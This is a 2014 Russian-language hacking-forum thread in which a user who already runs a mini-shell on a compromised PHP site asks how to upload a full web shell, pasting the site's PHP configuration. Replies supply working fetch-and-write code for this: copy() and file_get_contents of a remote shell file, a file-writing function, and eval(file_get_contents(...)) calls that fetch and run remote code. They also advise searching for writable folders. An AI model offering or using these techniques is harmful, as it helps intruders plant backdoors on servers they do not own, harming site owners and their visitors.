ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
09.09.2014, 23:56
|
|
Новичок
Регистрация: 12.08.2011
Сообщений: 1
Провел на форуме:
242
Репутация:
0
|
|
Помогите залить шелл через мини-шелл.
phpinfo(); выводит, но шелл не заливается.
Пробовал: copy('http://site.ru/s.txt','s.php');
Конфигурация PHP из phpinfo:
Код:
Directive Local Value Master Value
allow_call_time_pass_reference Off Off
allow_url_fopen On On
allow_url_include Off Off
always_populate_raw_post_data Off Off
arg_separator.input & &
arg_separator.output & &
asp_tags Off Off
auto_append_file no value no value
auto_globals_jit On On
auto_prepend_file no value no value
browscap no value no value
default_charset no value no value
default_mimetype text/html text/html
define_syslog_variables Off Off
disable_classes no value no value
disable_functions exec,passthru,shell_exec,system,proc_open,popen exec,passthru,shell_exec,system,proc_open,popen
display_errors Off Off
display_startup_errors Off Off
doc_root no value no value
docref_ext no value no value
docref_root no value no value
enable_dl Off Off
error_append_string no value no value
error_log no value no value
error_prepend_string no value no value
error_reporting 6143 6143
expose_php On On
extension_dir /usr/lib/php52/20060613 /usr/lib/php52/20060613
file_uploads On On
highlight.bg #FFFFFF #FFFFFF
highlight.comment #FF8000 #FF8000
highlight.default #0000BB #0000BB
highlight.html #000000 #000000
highlight.keyword #007700 #007700
highlight.string #DD0000 #DD0000
html_errors Off Off
ignore_repeated_errors Off Off
ignore_repeated_source Off Off
ignore_user_abort Off Off
implicit_flush Off Off
include_path .:/usr/share/pear .:/usr/share/pear
log_errors On On
log_errors_max_len 1024 1024
magic_quotes_gpc Off Off
magic_quotes_runtime Off Off
magic_quotes_sybase Off Off
mail.force_extra_parameters no value no value
max_execution_time 300 300
max_file_uploads 20 20
max_input_nesting_level 64 64
max_input_time 180 180
memory_limit 1024M 1024M
open_basedir /var/www/site-ru/data:. no value
output_buffering 4096 4096
output_handler no value no value
post_max_size 70M 70M
precision 14 14
realpath_cache_size 16K 16K
realpath_cache_ttl 120 120
register_argc_argv Off Off
register_globals On On
register_long_arrays Off Off
report_memleaks On On
report_zend_debug On On
safe_mode Off Off
safe_mode_exec_dir no value no value
safe_mode_gid Off Off
safe_mode_include_dir no value no value
sendmail_from no value no value
sendmail_path /usr/sbin/sendmail -t -i -f site@site.org /usr/sbin/sendmail -t -i
serialize_precision 100 100
short_open_tag On On
SMTP localhost localhost
smtp_port 25 25
sql.safe_mode Off Off
suhosin.log.phpscript.is_safe Off Off
track_errors Off Off
unserialize_callback_func no value no value
upload_max_filesize 70M 70M
upload_tmp_dir /var/www/site-ru/data/mod-tmp no value
user_dir no value no value
variables_order GPCS GPCS
xmlrpc_error_number 0 0
xmlrpc_errors Off Off
y2k_compliance On On
zend.ze1_compatibility_mode Off Off
|
|
|
10.09.2014, 01:24
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
file_get_contents, например . возможно нет прав на запись в эту папку.
также, /thread307894.html
и да, есть тема с вопросами /thread46016.html, поищи в ней по "allow_url_fopen"
и вот нашел, наконец, тыц |
|
|
|
10.09.2014, 01:25
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 2
Провел на форуме:
7702
Репутация:
0
|
|
copy('http://site.ru/s.txt','s.php'); нужно
Нужно прописать полный путь, если есть раскрытие путей, посмотри, и пробуй полный путь прописать. /var/www/site-ru/data не похоже на полный путь до сайта, хотя не уверен.
Ну на крайняк
Если file_get_contents не сработает пробуй курл, и если уже записался в какую либо диру то права есть, phpinfo() я так понял из залитого файла выводишь?
|
|
|
|
10.09.2014, 01:28
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
look2009,
Сообщение от None
disable_functions exec,passthru,shell_exec,
system
|
|
|
|
10.09.2014, 02:05
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 2
Провел на форуме:
7702
Репутация:
0
|
|
Сорри не заметил, пробуй шелл записать через запрос файла file get content или пиши curl скрипт запроса шелла в тело переменной и записывай в файл. Можешь записать полностью файл через file_put_contents, или так.
function save_file($file,$content)
{
$open = fopen($file,'ab');
fwrite($open,$content."\r\n");
fclose($open);
}
?a=eval(file_get_contents('http://site.ru/bla_bla.txt'));
Ну это конечно самое простое. )))
|
|
|
|
10.09.2014, 15:35
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
eval(file_get_contents("http://site.ru/shell.txt")); дальше лазишь и ищешь папку с разрешением на запись
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
